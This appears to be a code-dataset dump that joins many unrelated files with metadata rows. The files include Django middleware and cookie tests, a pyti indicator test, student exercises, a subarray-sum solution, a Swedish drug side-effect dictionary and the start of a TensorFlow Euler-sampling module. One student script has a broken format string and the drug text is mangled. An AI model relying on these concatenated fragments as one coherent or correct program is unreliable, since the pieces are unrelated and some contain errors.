self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="192.168.0.2")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertIn(b"IP is not allowed", response.content)
response = self.client.get("/batch/", REMOTE_ADDR="192.168.0.1")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
response = self.client.get("/batch/", REMOTE_ADDR="192.168.0.2")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# /24 block
response = self.client.get("/", REMOTE_ADDR="127.0.0.1")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="127.0.0.100")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="127.0.0.200")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertIn(b"IP is not allowed", response.content)
# precise ip
response = self.client.get("/", REMOTE_ADDR="128.0.0.1")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="128.0.0.2")
self.assertIn(b"IP is not allowed", response.content)
def test_trusted_proxies(self):
with self.settings(
ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25,128.0.0.1"], USE_X_FORWARDED_HOST=True,
):
with self.settings(TRUSTED_PROXIES="10.0.0.1"):
response = self.client.get("/", REMOTE_ADDR="10.0.0.1", HTTP_X_FORWARDED_FOR="192.168.0.1,10.0.0.1",)
self.assertNotIn(b"IP is not allowed", response.content)
def test_attempt_spoofing(self):
with self.settings(
ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25,128.0.0.1"], USE_X_FORWARDED_HOST=True,
):
with self.settings(TRUSTED_PROXIES="10.0.0.1"):
response = self.client.get("/", REMOTE_ADDR="10.0.0.1", HTTP_X_FORWARDED_FOR="192.168.0.1,10.0.0.2",)
self.assertIn(b"IP is not allowed", response.content)
def test_trust_all_proxies(self):
with self.settings(
ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25,128.0.0.1"], USE_X_FORWARDED_HOST=True,
):
with self.settings(TRUST_ALL_PROXIES=True):
response = self.client.get("/", REMOTE_ADDR="10.0.0.1", HTTP_X_FORWARDED_FOR="192.168.0.1,10.0.0.1",)
self.assertNotIn(b"IP is not allowed", response.content)
class TestToolbarCookieMiddleware(APIBaseTest):
CONFIG_AUTO_LOGIN = False
def test_logged_out_client(self):
response = self.client.get("/")
self.assertEqual(0, len(response.cookies))
def test_logged_in_client(self):
with self.settings(TOOLBAR_COOKIE_NAME="phtoolbar", TOOLBAR_COOKIE_SECURE=False):
self.client.force_login(self.user)
response = self.client.get("/")
toolbar_cookie = response.cookies[settings.TOOLBAR_COOKIE_NAME]
self.assertEqual(toolbar_cookie.key, settings.TOOLBAR_COOKIE_NAME)
self.assertEqual(toolbar_cookie.value, "yes")
self.assertEqual(toolbar_cookie["path"], "/")
self.assertEqual(toolbar_cookie["samesite"], "None")
self.assertEqual(toolbar_cookie["httponly"], True)
self.assertEqual(toolbar_cookie["domain"], "")
self.assertEqual(toolbar_cookie["comment"], "")
self.assertEqual(toolbar_cookie["secure"], "")
self.assertEqual(toolbar_cookie["max-age"], 31536000)
def test_logged_in_client_secure(self):
with self.settings(TOOLBAR_COOKIE_NAME="phtoolbar", TOOLBAR_COOKIE_SECURE=True):
self.client.force_login(self.user)
response = self.client.get("/")
toolbar_cookie = response.cookies[settings.TOOLBAR_COOKIE_NAME]
self.assertEqual(toolbar_cookie.key, "phtoolbar")
self.assertEqual(toolbar_cookie.value, "yes")
self.assertEqual(toolbar_cookie["path"], "/")
self.assertEqual(toolbar_cookie["samesite"], "None")
self.assertEqual(toolbar_cookie["httponly"], True)
self.assertEqual(toolbar_cookie["domain"], "")
self.assertEqual(toolbar_cookie["comment"], "")
self.assertEqual(toolbar_cookie["secure"], True)
self.assertEqual(toolbar_cookie["max-age"], 31536000)
def test_logout(self):
with self.settings(TOOLBAR_COOKIE_NAME="phtoolbar"):
self.client.force_login(self.user)
response = self.client.get("/")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME].key, "phtoolbar")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME].value, "yes")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME]["max-age"], 31536000)
response = self.client.get("/logout")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME].key, "phtoolbar")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME].value, "")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME]["max-age"], 0)
| [
"[email protected]"
] | |
8d4456f1709a03ff7ff76e4b6638771ded6bae27 | 4c6113392ea456e1eb964172b43f0c9846ca712a | /tests/test_standard_deviation.py | 6b866dc49e5a5dc366f0596b18e6b8812eb37b4d | [
"MIT"
] | permissive | g8a9/pyti | abd344d4d5eb30f36e6c860eb82567d7cacbd780 | 1697ea000730a2238df70505ba77e165619fdf8c | refs/heads/master | 2020-03-27T11:04:22.417031 | 2019-09-09T08:50:51 | 2019-09-09T08:50:51 | 146,463,237 | 0 | 1 | MIT | 2018-08-28T14:53:08 | 2018-08-28T14:53:07 | null | UTF-8 | Python | false | false | 9,669 | py | from __future__ import absolute_import
import unittest
import numpy as np
from tests.sample_data import SampleData
from pyti import standard_deviation
class TestStandardDeviation(unittest.TestCase):
def setUp(self):
"""Create data to use for testing."""
self.data = SampleData().get_sample_close_data()
self.std_period_6_expected = [np.nan, np.nan, np.nan, np.nan, np.nan,
6.5577905323871235, 3.523047922845588, 3.64000366300183,
2.6142411263437193, 2.6233540871691017, 2.5428206123646837,
2.8984064587286413, 2.8167262321117761, 3.8064874447010402,
4.1082230546389029, 8.3307254586060449, 10.698429168184775,
14.471698472075328, 14.149189022696682, 16.029104466563318,
13.032673938988863, 10.08650583700817, 9.4405432400189078,
10.488392949669004, 10.589531938035151, 8.7339880161737451,
5.0316216736422801, 3.8436670858265902, 3.9887023788027181,
4.0649809347646144, 4.083843369507024, 4.8440000688136395,
11.967095581914025, 11.182192390880525, 11.491860887892189,
16.916712151006177, 22.056151447309816, 22.859576257373337,
16.434078820142823, 14.253613810773276, 13.039983767883554,
13.022551209344496, 12.50387726533919, 16.058846471649176,
15.333279710051146, 12.463120663247507, 8.355378307812666,
9.0049564129983466, 6.6962407364132304, 6.4353546910795751,
5.2716958055891929, 5.3789689222625849, 9.4365405031010461,
9.4650967594983619, 10.229352700277104, 9.58579104716976,
6.4664696705389293, 4.0370422341114756, 5.161696103672357,
5.3648150014701983, 5.8074081998770941, 5.3992755686912774,
5.2324474834121784, 1.4768265526684596, 1.3318358257182561,
3.448881944437431, 4.2672145481566792, 4.2827919242786781,
5.130538633191148, 5.783125164361131, 5.2763611198123055,
6.6918926072275768, 8.2688781988046696, 8.8089197218879818,
7.3125547291399391, 5.0221549159698196, 5.0711711336402896,
4.9256529178035535, 5.6864083567749528, 6.5936466895540216,
8.2274234524951151, 8.8677071444652373, 7.4646598493612917,
8.3602240799315091, 8.0184206674381961, 8.3401744586069686,
6.6355034976003617, 2.6993406602353964, 2.0581391271405236,
2.0719885778321165, 2.0978504872051325, 2.2254437759692176,
3.049114078985355, 4.1007641564306905, 4.3524338019089699,
3.4153872401237066, 3.4531299811426996, 2.9287608301122723,
2.648205052483652, 2.6683584217017398, 2.7031296676260124,
1.2711792425408255, 1.158740695755534, 4.2491112796285666,
4.7691131250998939, 4.4221567136409838, 3.7499159990591719,
5.0847300813317311, 13.454516589854368, 17.889961896736011,
19.98118781921303, 18.782584131760668, 12.993947821966982,
3.989429783816254, 2.5093963417523479, 2.2056057369046482,
2.4943830232477606, 8.4362062958812629, 9.8113133677403432,
11.767257964368774, 10.560069602043356, 9.2450563365869662,
6.762383209096229, 10.628135772561432, 10.820357973129482,
11.395558345250143, 8.3253558482505863]
self.std_period_8_expected = [np.nan, np.nan, np.nan, np.nan, np.nan,
np.nan, np.nan, 7.0210000050867709, 4.1373628591859681,
3.2119864792457009, 2.7914512354687684, 3.4517159293810558,
2.9480489916456389, 3.3239821213203209, 3.5875118217824093,
7.0898191594910145, 9.6610417029280189, 14.687200878413067,
16.195911080093211, 18.167517274756381, 17.864408150605726,
15.684568394262103, 11.769444625202757, 10.355555358633076,
8.9695687903998031, 8.9965326654217108, 9.4195188685136966,
7.8538143599145407, 4.9657714118035772, 4.4569047555450325,
3.8001832662573869, 4.1709606207683017, 10.62482193128093,
10.778041168439238, 10.368574688520509, 14.639153956818289,
18.713909981233599, 19.898422047991648, 19.861963649146077,
19.509732690194838, 14.34043079398743, 12.959500651755734,
12.497358506614786, 14.475216998126715, 15.211531281517024,
17.001755161495186, 16.432812069149929, 14.674135408943185,
9.7164201961715975, 7.6440704143800264, 5.8451933855335998,
5.64821447766586, 8.2422530726910797, 10.625605192848331,
11.692462086440853, 9.3994635105262265, 8.8257479448324467,
8.2020719290049708, 6.6277963101298756, 4.6265561088752829,
5.0357789509525652, 5.1546871874052478, 5.4984069121363168,
4.875291749511721, 4.4419035494770691, 3.0770089256567457,
3.888717884562241, 3.9120171997869004, 5.1726366238947525,
6.0172975365073498, 5.404976542832701, 6.0530629790686739,
7.3309684363176757, 7.7985836626183254, 7.575020980640458,
9.0041798825402761, 8.6284213710934914, 5.4515083102883279,
5.1782069083529505, 5.6630795193831744, 7.1805271145548293,
8.1723628337044669, 8.0955966867356697, 7.9802591257606208,
7.8027393312495414, 8.0798487211793066, 7.3342765491901138,
7.2319093260355505, 5.8455966333642975, 2.3867655938529189,
2.3230690906643527, 2.6017847583094862, 2.8489970039597292,
3.6898432022435403, 4.8986382947567213, 4.7263741388087315,
4.3969662837006034, 4.042064536135654, 3.9273398394187429,
3.2888054170821017, 2.6214268197736392, 2.3381906924555294,
2.3338621424582748, 3.6274033904630554, 4.3679741544892181,
4.5729569989543766, 4.3530613201680106, 5.4448558619253422,
13.02311290140943, 16.948090442373044, 18.927592811629722,
20.199922736768791, 19.547403736996472, 17.506905933292263,
11.913134333283477, 4.0137655992489707, 3.0322316157293447,
7.5580302611574259, 9.5411865651725272, 11.636474598065714,
11.543465684100253, 12.016773321962457, 12.317852244956159,
13.544956625991842, 11.53342773667667, 12.324006697151235,
11.031367937451309]
self.std_period_10_expected = [np.nan, np.nan, np.nan, np.nan, np.nan,
np.nan, np.nan, np.nan, np.nan, 6.4860058759009869, 4.1526223307955945,
3.9927105802672158, 3.3004546824810688, 3.5370766334801407,
3.3311401118002317, 6.4384024933726254, 8.9119850014834938,
13.351934067142995, 15.482619969214232, 19.070120928358637,
20.404015100519359, 18.748148353015203, 16.133700409047169,
14.06749796121858, 10.572570590395159, 9.1555945859470089,
8.3281877447083907, 8.5784715033234864, 8.6222052476923263,
7.3341742699653665, 4.63688305270301, 4.7504993889531688,
9.7508812137387935, 9.598666805574835, 9.6019130616999515,
13.188306942136279, 16.671782548166032, 17.789894790770031,
17.598722302106669, 17.607555480531644, 17.578184743849089,
18.26081734205783, 14.630932263150182, 14.408303315950986,
13.91782390398089, 15.258254924247829, 17.018062822255114,
19.390673273509599, 17.141471640439732, 13.282047574744562,
8.829194250389504, 6.9174080727136875, 7.5843822717769385,
9.459425928082986, 10.848561399763753, 11.075405435267605,
10.800855984596765, 8.4768862207770468, 8.7709599753327296,
8.5115699035032346, 6.5623254685786003, 4.577379648275234,
4.8737227386601729, 4.8845566158386609, 4.9416124224116613,
4.7068613038131062, 4.847774403441905, 3.641202640154293,
4.865707211358564, 5.8317850326179617, 5.5646648097117852,
5.8853513064217546, 6.6371132446435244, 7.1101839326107275,
7.1871184922903826, 8.3465498527502113, 9.073611555861687,
9.0870854024330132, 8.3398348638060895, 5.9142930450073328,
6.4203717441697474, 7.2659339080090346, 7.2219849533674978,
7.5313847774938836, 7.758637122587956, 7.6485459039247745,
7.1610294883720007, 7.2388940990856998, 6.9341618895949626,
6.6686421239842977, 5.2047658715621195, 2.6397003196912121,
3.1091942507487307, 3.9894729532163118, 4.6656708461318193,
4.5243402220041311, 5.1604522842264302, 5.3878571291789461,
4.974325638270523, 4.4714657055103819, 3.9744830551350327,
3.0170508042715429, 2.3489572154468794, 3.5151007572092858,
4.0541939875749557, 4.1687462810245028, 4.2825289776537945,
5.7083739657921253, 12.580634324230228, 16.397131049871689,
19.065494398694895, 20.371646308861077, 19.941000225665718,
20.204460151164653, 18.947481949383747, 16.459877952834979,
11.294674261202355, 8.0265482410975864, 9.2898478040397627,
11.14332904576645, 11.873670966563889, 12.684673166200744,
13.797316164143426, 16.063193435096697, 15.897444378823213,
15.397173477983268, 12.449335591374611]
def test_standard_deviation_period_6(self):
period = 6
std = standard_deviation.standard_deviation(self.data, period)
np.testing.assert_array_equal(std, self.std_period_6_expected)
def test_standard_deviation_period_8(self):
period = 8
std = standard_deviation.standard_deviation(self.data, period)
np.testing.assert_array_equal(std, self.std_period_8_expected)
def test_standard_deviation_period_10(self):
period = 10
std = standard_deviation.standard_deviation(self.data, period)
np.testing.assert_array_equal(std, self.std_period_10_expected)
def test_standard_deviation_invalid_period(self):
period = 128
with self.assertRaises(Exception) as cm:
standard_deviation.standard_deviation(self.data, period)
expected = "Error: data_len < period"
self.assertEqual(str(cm.exception), expected)
| [
"[email protected]"
] | |
3208b05d0da560dca27f9423abf4a82b2b8c2985 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/30/usersdata/82/9455/submittedfiles/atividade.py | c5d3ff8f09f278a98531a889412358d110818bae | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
n=input('Digite o valor de n:')
i=1
j=n
soma=0
while i<=n:
soma=soma+i/j
i=i+1
j=j-1
print('%.5 f' %soma)
| [
"[email protected]"
] | |
9ccd664cded01d384a74b70078226710006213ac | cf7fed790b733b9a21ec6c65970e9346dba103f5 | /opencv/gen_sine_table.py | a92197731a8388aa38b098c9704de464791890c8 | [
"MIT"
] | permissive | CospanDesign/python | a582050993efc1e6267683e38dd4665952ec6d40 | a3d81971621d8deed2f1fc738dce0e6eec0db3a7 | refs/heads/master | 2022-06-20T15:01:26.210331 | 2022-05-29T01:13:04 | 2022-05-29T01:13:04 | 43,620,126 | 6 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,006 | py | #! /usr/bin/env python3
# Copyright (c) 2017 Dave McCoy ([email protected])
#
# NAME is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# any later version.
#
# NAME is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NAME; If not, see <http://www.gnu.org/licenses/>.
import sys
import os
import argparse
import numpy as np
#sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir)))
NAME = os.path.basename(os.path.realpath(__file__))
DESCRIPTION = "\n" \
"\n" \
"usage: %s [options]\n" % NAME
EPILOG = "\n" \
"\n" \
"Examples:\n" \
"\tSomething\n" \
"\n"
def main(argv):
#Parse out the commandline arguments
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=DESCRIPTION,
epilog=EPILOG
)
parser.add_argument("-t", "--test",
nargs=1,
default=["something"])
parser.add_argument("-d", "--debug",
action="store_true",
help="Enable Debug Messages")
args = parser.parse_args()
print ("Running Script: %s" % NAME)
if args.debug:
print ("test: %s" % str(args.test[0]))
sine_table = []
for i in range(0, 180):
j = i / 2
#print ("%f" % (j))
k = np.deg2rad(j)
sine_table.append(np.sin(k))
with open("sine_table_float.txt", 'w') as f:
for d in sine_table:
f.write("%f\n" % d)
if __name__ == "__main__":
main(sys.argv)
| [
"[email protected]"
] | |
60e9881d0417bfd779ab8f261e6d4a6eba1be611 | f2ee087b896000ce500ecdb50d6af3a81c9ea67a | /ex16_read_write_file/ex16.py | 21af6acf9f67a01ada06dcad48bed4c2ac91e3b0 | [] | no_license | billgoo/Learn_Python_the_Hard_Way | 5a029223701f1fd6929afbe51b7cd3bfff3e7410 | a280b4110a10d41edda2e90c817f7a8fbc0cecd6 | refs/heads/master | 2020-05-04T17:39:42.275970 | 2019-08-14T14:28:35 | 2019-08-14T14:28:35 | 179,321,167 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,665 | py | """
========= ===============================================================
Character Meaning
--------- ---------------------------------------------------------------
'r' open for reading (default)
'w' open for writing, truncating the file first
'x' create a new file and open it for writing
'a' open for writing, appending to the end of the file if it exists
'b' binary mode
't' text mode (default)
'+' open a disk file for updating (reading and writing)
'U' universal newline mode (deprecated)
========= ===============================================================
"""
from sys import argv
script, filename = argv
print(f"We're going to erase {filename}.")
print("If you don't want that, hit CTRL-C (^C).") # KeyboardInterrupt
print("If you do want that, hit RETURN.")
input("?")
print("Opening the file...")
target = open(filename, 'w') # open tries to be safe by making you explicitly say you want to write a file
print("Truncating the file. Goodbye!")
# no need truncate because 'w' mode will first do a truncate then do writing
target.truncate()
print("Now I'm going to ask you for three lines.")
line1 = input("line 1: ")
line2 = input("line 2: ")
line3 = input("line 3: ")
print("I'm going to write these to the file.")
'''
target.write(line1)
target.write("\n")
target.write(line2)
target.write("\n")
target.write(line3)
target.write("\n")
'''
# study drill
target.write(f"{line1}\n{line2}\n{line3}\n")
print("And finally, we close it.")
target.close()
txt = open(filename)
print(f"Here's your file {filename}:")
print(txt.read())
txt.close() | [
"[email protected]"
] | |
ae8c313063f63d8ca46adb08c54ed25e9c15a211 | 6968c7f9d2b20b5296663829f99a27d184a59fc1 | /experiments/explorations/experiments/experiment_000202/repetition_000002/calc_statistics_per_repetition.py | 782a2e55a6ea5672f1258b531b384649ad3979d5 | [
"MIT"
] | permissive | flowersteam/automated_discovery_of_lenia_patterns | d42dff37323d51732571b33845c0562d844f498f | 97cc7cde2120fa95225d1e470e00b8aa8c034e97 | refs/heads/master | 2020-06-29T07:08:58.404541 | 2020-05-14T07:37:10 | 2020-05-14T07:37:10 | 200,470,902 | 13 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,282 | py | import exputils
import autodisc as ad
import os
import imageio
import numpy as np
import torch
import importlib
from torch.autograd import Variable
from sklearn.manifold import TSNE
tsne = TSNE(n_components=2, init='pca', random_state=0)
def collect_final_observation(explorer):
data = dict()
for run_data in explorer.data:
if run_data.observations is not None and len(run_data.observations.states) > 0:
# rescale values from [0 1] to [0 255] and convert to uint8 for saving as bw image
img_data = run_data.observations.states[-1] * 255
img_data = img_data.astype(np.uint8)
png_image = imageio.imwrite(
imageio.RETURN_BYTES,
img_data,
format='PNG-PIL')
data['{:06d}.png'.format(run_data.id)] = png_image
return data
def collect_observations(explorer):
timestamps = [0, 24, 49, 74, 99, 124, 149, 174, 199]
data = dict()
for run_data in explorer.data:
if run_data.observations is not None and len(run_data.observations.states) > 0:
for timestamp in timestamps:
# rescale values from [0 1] to [0 255] and convert to uint8 for saving as bw image
img_data = run_data.observations.states[timestamp] * 255
img_data = img_data.astype(np.uint8)
png_image = imageio.imwrite(
imageio.RETURN_BYTES,
img_data,
format='PNG-PIL')
data['{:06d}_{:06d}.png'.format(run_data.id, timestamp)] = png_image
return data
def collect_representation(explorer):
data = dict()
data_representations = []
n_runs = explorer.data.__len__()
if hasattr(explorer.config.goal_space_representation, 'type') and explorer.config.goal_space_representation.type == 'pytorchnnrepresentation':
if type(explorer).__name__.lower() == 'goalspaceexplorer':
explorer_type = 'pretrainVAE'
elif type(explorer).__name__.lower() == 'onlinelearninggoalexplorer':
explorer_type = 'onlineVAE'
model = explorer.goal_space_representation.model
n_dims_goal_space = model.n_latents
representation_legend = ['dim {}'.format(dim) for dim in range(n_dims_goal_space)]
else:
explorer_type = 'HF'
model = None
representation_legend = explorer.config.goal_space_representation.config.statistics
n_dims_goal_space = len(explorer.config.goal_space_representation.config.statistics)
for run_data in explorer.data:
if run_data.observations is not None and len(run_data.observations.states) > 0:
# fixed representation stored in run_data.reached goal
if explorer_type == 'HF' or explorer_type == 'pretrainVAE': #
data_representations.append(run_data.reached_goal)
# online version: recompute the reached goal with last trained VAE
elif explorer_type == 'onlineVAE':
final_observation = run_data.observations.states[-1]
input_img = Variable(torch.from_numpy(final_observation).unsqueeze(0).unsqueeze(0).float())
outputs = model(input_img)
representation = outputs['mu'].cpu().data.numpy().reshape(n_dims_goal_space)
data_representations.append(representation)
data['representation_type'] = explorer_type
data['n_runs'] = n_runs
data['n_dims_goal_space'] = n_dims_goal_space
data['representation_legend'] = representation_legend
data['coordinates_in_goal_space'] = data_representations
data['coordinates_in_tsne_space'] = tsne.fit_transform(np.asarray(data_representations))
return data
# def load_data(experiment_directory):
#
# dh = ad.ExplorationDataHandler.create(directory=os.path.join(experiment_directory, 'results'))
# dh.load(load_observations=False, verbose=True)
#
# dh.config.save_automatic = False
# dh.config.load_observations = True
# dh.config.memory_size_observations = 1
#
# return dh
def load_explorer(experiment_directory):
# load the full explorer without observations and add its config
explorer = ad.explorers.GoalSpaceExplorer.load_explorer(os.path.join(experiment_directory, 'results'), run_ids=[], load_observations=False, verbose=False)
explorer.data.config.load_observations = True
explorer.data.config.memory_size_observations = 1
spec = importlib.util.spec_from_file_location('experiment_config', os.path.join(experiment_directory, 'experiment_config.py'))
experiment_config_module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(experiment_config_module)
explorer.config = experiment_config_module.get_explorer_config()
return explorer
if __name__ == '__main__':
experiments = '.'
statistics = [('final_observation', collect_final_observation, 'zip'),
('observations', collect_observations, 'zip'),
('representations', collect_representation),
]
exputils.calc_experiment_statistics(statistics, load_explorer, experiments, recalculate_statistics=False, verbose=True) | [
"[email protected]"
] | |
667d3a55f26dcbea425733e4d22f03d40b58aea2 | 8f26514c451e2398d5e3688c184ea74d1dad21b2 | /month_01/test_01/test_02.py | 60b70e67643224bf76ad67e8d5c2bc33fc6e5eb3 | [] | no_license | CircularWorld/Python_exercise | 25e7aebe45b4d2ee4e3e3afded082c56483117de | 96d4d9c5c626f418803f44584c5350b7ce514368 | refs/heads/master | 2022-11-21T07:29:39.054971 | 2020-07-20T10:12:24 | 2020-07-20T10:12:24 | 281,081,559 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 742 | py | '''
2.需求:在终端中获取月份和年份,打印相应的天数.
1 3 5 7 8 10 12 有 31天
2平年有28天,闰年有29天
4 6 9 11 有 30天
步骤:在终端中录入年份和月份,根据逻辑判断 ,显示天数
'''
month = int(input('请输入月份:'))
year = int(input("请输入年份:"))
if month in range(1,13):
if month in (4, 6, 9, 11):
print(f"{year}年{month:02}月有30天")
elif month == 2:
if year % 4 == 0 and year % 100 != 0 or year % 400 == 0:
print(f'{year}是闰年,二月有29天')
else:
print(f'{year}是平年,二月有28天')
else:
print(f"{year}年{month:02}月有31天")
else:
print("输入有误")
| [
"[email protected]"
] | |
4f7885709411c1849cb738566eade86235d66115 | 906ca170744eb2e075b7236814f2137a0283966d | /highFreq/subarraySumClosest.py | 375a0b7543a6c12ebb1706033df97221ba3ac4fe | [] | no_license | logancyang/lintcode | 815f893ee970d760403b409f2adcb11627ce917e | c541fa91b2187391320a8a1dd3e2ca75041b3dab | refs/heads/master | 2021-05-30T14:03:28.795033 | 2015-10-26T19:50:45 | 2015-10-26T19:50:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,259 | py | # subarraySumClosest: http://www.lintcode.com/en/problem/subarray-sum-closest/
class Solution:
"""
@param nums: A list of integers
@return: A list of integers includes the index of the first number
and the index of the last number
"""
# brute force O(n^3)
def subarraySumClosestBrute(self, nums):
result = [0, 0]
if nums is None or len(nums) <= 1:
return result
min_dist = float("inf")
# does allow [i, i], a single element as result
for i in xrange(len(nums)):
if abs(nums[i]) < min_dist:
min_dist = abs(nums[i])
result = [i, i]
# this part is O(n^3), too slow
for i in xrange(len(nums)):
for j in xrange(i+1, len(nums)):
tmp_sum = sum(nums[i:j+1])
distance = abs(tmp_sum)
if distance < min_dist:
min_dist = distance
result = [i, j]
return result
def subarraySumClosest(self, nums):
result = [0, 0]
if nums is None or len(nums) <= 1:
return result
min_dist = float("inf")
# does allow [i, i], a single element as result
for i in xrange(len(nums)):
if abs(nums[i]) < min_dist:
min_dist = abs(nums[i])
result = [i, i]
# compute prefix_sum[i] = sum(nums[:i+1]), O(n)
accumulator = 0
pair_sum_ind = []
for i in xrange(len(nums)):
accumulator += nums[i]
# accumulator is prefix_sum[i], i inclusive
pair_sum_ind.append((accumulator, i))
pair_sum_ind.sort(key=lambda tup: tup[0])
min_diff = float("inf")
for i in xrange(1, len(nums)):
diff = abs(pair_sum_ind[i][0] - pair_sum_ind[i-1][0])
if diff < min_diff:
min_diff = diff
result = [pair_sum_ind[i][1], pair_sum_ind[i-1][1]]
result.sort()
# since prefix_sum[j] - prefix_sum[i] refers to subarray sum i+1 to j
# the smaller index in prefix_sum should + 1
result[0] = result[0] + 1
return result
A = [-3, 1, 1, -3, 5]
Sol = Solution()
print Sol.subarraySumClosest(A) | [
"[email protected]"
] | |
c56498fc4dae80612f8baae4f506c36ed59b0171 | b39d9ef9175077ac6f03b66d97b073d85b6bc4d0 | /Benzylpenicillin_Panpharma_powder_for_solution_for_injection_or_infusion_SmPC.py | 69089c71ae727141e3d4f4acc96f228c2a5007ba | [] | no_license | urudaro/data-ue | 2d840fdce8ba7e759b5551cb3ee277d046464fe0 | 176c57533b66754ee05a96a7429c3e610188e4aa | refs/heads/master | 2021-01-22T12:02:16.931087 | 2013-07-16T14:05:41 | 2013-07-16T14:05:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 511 | py | {'_data': [['Uncommon',
[['General',
u'(>1/1 000 till Blodet och lymfsystemet: eosinofili < 1/100): Hud och subkutan v\xe4vnad: urtikaria']]],
['Rare',
[['General',
u'< 1/1 000): anafylaktiska reaktioner. Blodet och lymfsystemet: agranulocytos, hemolytisk anemi, leukopeni. Magtarmkanalen: diarr\xe9 orsakad av Clostridium difficile.']]],
['Unknown', [['General', u'tromboflebit']]]],
'_pages': [2, 3],
u'_rank': 3,
u'_type': u'LSFU'} | [
"daro@daro-ThinkPad-X220.(none)"
] | daro@daro-ThinkPad-X220.(none) |
813ed9d22c40ad0ebf512f0f48797ec447f7b234 | 00cb5907750926f1a9b0fde97301f10d01f49645 | /tf_quant_finance/models/euler_sampling.py | 27d3ed52099fd2850f5f9dd8d627110fafddc958 | [
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-generic-cla"
] | permissive | dannyb2018/tf-quant-finance | 63761e4a39b615da6a5258e48030d2b12a142b26 | 668b4fb0f91b1f60c9015cef087b3e879ee2a4f7 | refs/heads/master | 2023-07-07T20:00:59.529305 | 2021-08-18T13:05:11 | 2021-08-18T13:05:51 | 284,707,826 | 0 | 0 | Apache-2.0 | 2020-08-03T13:29:15 | 2020-08-03T13:29:14 | null | UTF-8 | Python | false | false | 22,684 | py | # Lint as: python3
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The Euler sampling method for ito processes."""
from typing import Callable, List, Optional
import tensorflow.compat.v2 as tf
from tf_quant_finance import types
from tf_quant_finance import utils as tff_utils
from tf_quant_finance.math import custom_loops
from tf_quant_finance.math import random
from tf_quant_finance.models import utils
def sample(
dim: int,
drift_fn: Callable[..., types.RealTensor],
volatility_fn: Callable[..., types.RealTensor],
times: types.RealTensor,
time_step: Optional[types.RealTensor] = None,
num_time_steps: Optional[types.IntTensor] = None,
num_samples: types.IntTensor = 1,
initial_state: Optional[types.RealTensor] = None,
random_type: Optional[random.RandomType] = None,
seed: Optional[types.IntTensor] = None,
swap_memory: bool = True,
skip: types.IntTensor = 0,
precompute_normal_draws: bool = True,
times_grid: Optional[types.RealTensor] = None,
normal_draws: Optional[types.RealTensor] = None,
watch_params: Optional[List[types.RealTensor]] = None,
validate_args: bool = False,
tolerance: Optional[types.RealTensor] = None,
dtype: Optional[tf.DType] = None,
name: Optional[str] = None) -> types.RealTensor:
"""Returns a sample paths from the process using Euler method.
For an Ito process,
```
dX = a(t, X_t) dt + b(t, X_t) dW_t
X(t=0) = x0
```
with given drift `a` and volatility `b` functions Euler method generates a
sequence {X_n} as
```
X_{n+1} = X_n + a(t_n, X_n) dt + b(t_n, X_n) (N(0, t_{n+1}) - N(0, t_n)),
X_0 = x0
```
where `dt = t_{n+1} - t_n` and `N` is a sample from the Normal distribution.
See [1] for details.
#### Example
Sampling from 2-dimensional Ito process of the form:
```none
dX_1 = mu_1 * sqrt(t) dt + s11 * dW_1 + s12 * dW_2
dX_2 = mu_2 * sqrt(t) dt + s21 * dW_1 + s22 * dW_2
```
```python
